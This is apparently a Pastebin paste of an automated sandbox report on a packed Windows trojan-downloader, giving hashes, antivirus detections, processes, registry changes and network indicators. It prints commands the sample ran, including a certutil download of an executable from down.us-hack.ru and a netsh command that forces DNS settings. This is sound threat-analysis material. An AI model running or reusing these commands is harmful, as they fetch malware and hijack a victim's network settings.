Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * ID: 1729
- * MalFamily: "Deepscan"
- * MalScore: 10.0
- * File Name: "Exes_a11eb542f7afda5d8488efda4cdf28ee.1"
- * File Size: 53248
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
- * SHA256: "77e5c80fce0688599dc9369959d7263dca2b685d3cfe2c48f906b1e2665298b2"
- * MD5: "a11eb542f7afda5d8488efda4cdf28ee"
- * SHA1: "b1baa315e22cba5da3930445455257c4e755d648"
- * SHA512: "483f9dc02f78fbb3a0079fbbb0a3146155ff678438be05c46967a037c18ac1a080adfa118a6cd0156d6cfc173395aec43bbdd2f3776948fd62823dd2ffa9678e"
- * CRC32: "924623F0"
- * SSDEEP: "1536:dRkq4IrZntb4tGkX4N8C7RTupN+ObUSnnouy8:dKMhcGw4NZun+21out"
- * Process Execution:
- "yar35M546r6hg.exe",
- "cmd.exe",
- "certutil.exe",
- "netsh.exe"
- * Executed Commands:
- "\"C:\\Windows\\sysnative\\cmd.exe\" /c \"C:\\Users\\user\\AppData\\Local\\Temp\\ADD6.tmp\\ADE6.tmp\\ADE7.bat C:\\Users\\user\\AppData\\Local\\Temp\\yar35M546r6hg.exe\"",
- "C:\\Windows\\sysnative\\cmd /c \"C:\\Users\\user\\AppData\\Local\\Temp\\ADD6.tmp\\ADE6.tmp\\ADE7.bat C:\\Users\\user\\AppData\\Local\\Temp\\yar35M546r6hg.exe\"",
- "certutil.exe -urlcache -split -f http://down.us-hack.ru/wget.exe",
- "netsh interface ip set dns \"??????\" source=static addr=114.114.114.114 register=primary"
- * Signatures Detected:
- "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
- "Details":
- "Description": "A process attempted to delay the analysis task.",
- "Details":
- "Process": "yar35M546r6hg.exe tried to sleep 353 seconds, actually delayed analysis time by 0 seconds"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "yar35M546r6hg.exe -> C:\\Windows\\sysnative\\cmd"
- "Description": "The binary likely contains encrypted or compressed data.",
- "Details":
- "section": "name: UPX1, entropy: 7.98, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x0000c600, virtual_size: 0x0000d000"
- "Description": "The executable is compressed using UPX",
- "Details":
- "section": "name: UPX0, entropy: 0.00, characteristics: IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00000000, virtual_size: 0x00010000"
- "Description": "Uses Windows utilities for basic functionality",
- "Details":
- "command": "\"C:\\Windows\\sysnative\\cmd.exe\" /c \"C:\\Users\\user\\AppData\\Local\\Temp\\ADD6.tmp\\ADE6.tmp\\ADE7.bat C:\\Users\\user\\AppData\\Local\\Temp\\yar35M546r6hg.exe\""
- "command": "\"C:\\Windows\\sysnative\\cmd.exe\" /c \"C:\\Users\\user\\AppData\\Local\\Temp\\ADD6.tmp\\ADE6.tmp\\ADE7.bat C:\\Users\\user\\AppData\\Local\\Temp\\yar35M546r6hg.exe\""
- "command": "C:\\Windows\\sysnative\\cmd /c \"C:\\Users\\user\\AppData\\Local\\Temp\\ADD6.tmp\\ADE6.tmp\\ADE7.bat C:\\Users\\user\\AppData\\Local\\Temp\\yar35M546r6hg.exe\""
- "command": "C:\\Windows\\sysnative\\cmd /c \"C:\\Users\\user\\AppData\\Local\\Temp\\ADD6.tmp\\ADE6.tmp\\ADE7.bat C:\\Users\\user\\AppData\\Local\\Temp\\yar35M546r6hg.exe\""
- "command": "netsh interface ip set dns \"??????\" source=static addr=114.114.114.114 register=primary"
- "command": "netsh interface ip set dns \"??????\" source=static addr=114.114.114.114 register=primary"
- "Description": "Attempts to execute a Living Off The Land Binary command for post exeploitation",
- "Details":
- "MITRE T1127 - certutil": "(Tactic: Defense Evasion)"
- "MITRE T1105 - certutil": "(Tactic: Command And Control, Lateral Movement)"
- "Description": "File has been identified by 45 Antiviruses on VirusTotal as malicious",
- "Details":
- "MicroWorld-eScan": "DeepScan:Generic.Malware.SDTk.1EB60964"
- "FireEye": "Generic.mg.a11eb542f7afda5d"
- "CAT-QuickHeal": "Trojan.CoinMinerPMF.S2180977"
- "McAfee": "Artemis!A11EB542F7AF"
- "K7AntiVirus": "Trojan ( 0051918e1 )"
- "Alibaba": "TrojanDownloader:Win32/Generic.4cc3db15"
- "K7GW": "Trojan ( 0051918e1 )"
- "Cybereason": "malicious.2f7afd"
- "TrendMicro": "TROJ_GEN.R002C0PHO19"
- "Symantec": "Trojan.Gen.MBT"
- "APEX": "Malicious"
- "Paloalto": "generic.ml"
- "ClamAV": "Win.Malware.Xtrat-6913730-0"
- "Kaspersky": "HEUR:Trojan-Downloader.BAT.Generic"
- "BitDefender": "DeepScan:Generic.Malware.SDTk.1EB60964"
- "Avast": "Win32:Malware-gen"
- "Endgame": "malicious (moderate confidence)"
- "Sophos": "Mal/Generic-S"
- "F-Secure": "Heuristic.HEUR/AGEN.1035551"
- "DrWeb": "BackDoor.Xtreme.38"
- "VIPRE": "Trojan.Win32.Generic!BT"
- "Invincea": "heuristic"
- "McAfee-GW-Edition": "BehavesLike.Win32.Generic.qc"
- "Trapmine": "malicious.high.ml.score"
- "Emsisoft": "DeepScan:Generic.Malware.SDTk.1EB60964 (B)"
- "Ikarus": "Backdoor.Xtreme"
- "Jiangmin": "RiskTool.BitCoinMiner.gwc"
- "Webroot": "W32.Trojan.GenKDZ"
- "Avira": "HEUR/AGEN.1035551"
- "Microsoft": "Trojan:Win32/ScarletFlash.A"
- "Arcabit": "DeepScan:Generic.Malware.SDTk.1EB60964"
- "AegisLab": "Trojan.BAT.Generic.a!c"
- "ZoneAlarm": "HEUR:Trojan-Downloader.BAT.Generic"
- "GData": "DeepScan:Generic.Malware.SDTk.1EB60964"
- "Acronis": "suspicious"
- "ALYac": "DeepScan:Generic.Malware.SDTk.1EB60964"
- "Ad-Aware": "DeepScan:Generic.Malware.SDTk.1EB60964"
- "Cylance": "Unsafe"
- "Zoner": "Trojan.Win32.73853"
- "TrendMicro-HouseCall": "TROJ_GEN.R002C0PHO19"
- "SentinelOne": "DFI - Malicious PE"
- "Fortinet": "W32/GenericRXGY.II!tr"
- "AVG": "Win32:Malware-gen"
- "CrowdStrike": "win/malicious_confidence_100% (W)"
- "Qihoo-360": "HEUR/QVM18.1.674F.Malware.Gen"
- "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
- "Details":
- "target": "clamav:Win.Malware.Xtrat-6913730-0, sha256:77e5c80fce0688599dc9369959d7263dca2b685d3cfe2c48f906b1e2665298b2, type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
- "Description": "Suspicious use of certutil was detected",
- "Details":
- "command": "certutil.exe -urlcache -split -f http://down.us-hack.ru/wget.exe"
- "Description": "Uses suspicious command line tools or Windows utilities",
- "Details":
- "command": "certutil.exe -urlcache -split -f http://down.us-hack.ru/wget.exe"
- * Started Service:
- * Mutexes:
- "Local\\ZoneAttributeCacheCounterMutex",
- "Local\\ZonesCacheCounterMutex",
- "Local\\ZonesLockedCacheCounterMutex"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\ADD6.tmp\\ADE6.tmp\\ADE7.bat",
- "\\Device\\KsecDD",
- "\\Device\\Http\\Communication"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\ADD6.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\ADD6.tmp\\ADE6.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\ADD6.tmp\\ADE6.tmp\\ADE7.tmp",
- "C:\\Windows\\system\\debug",
- "C:\\Windows\\python36",
- "C:\\Windows\\cerB0C4.tmp"
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-100",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-101",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-103",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-102",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-1",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-2",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-4",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-3",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-100",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-101",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-102",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-103",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-100",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-101",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-102",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-103",
- "HKEY_CURRENT_USER\\SYSTEM\\CurrentControlSet\\Control\\NetTrace",
- "HKEY_CURRENT_USER\\System\\CurrentControlSet\\Control\\NetTrace\\Session"
- * Deleted Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
- * DNS Communications:
- "type": "A",
- "request": "down.us-hack.ru",
- "answers":
- * Domains:
- "ip": "14.29.194.121",
- "domain": "down.us-hack.ru"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement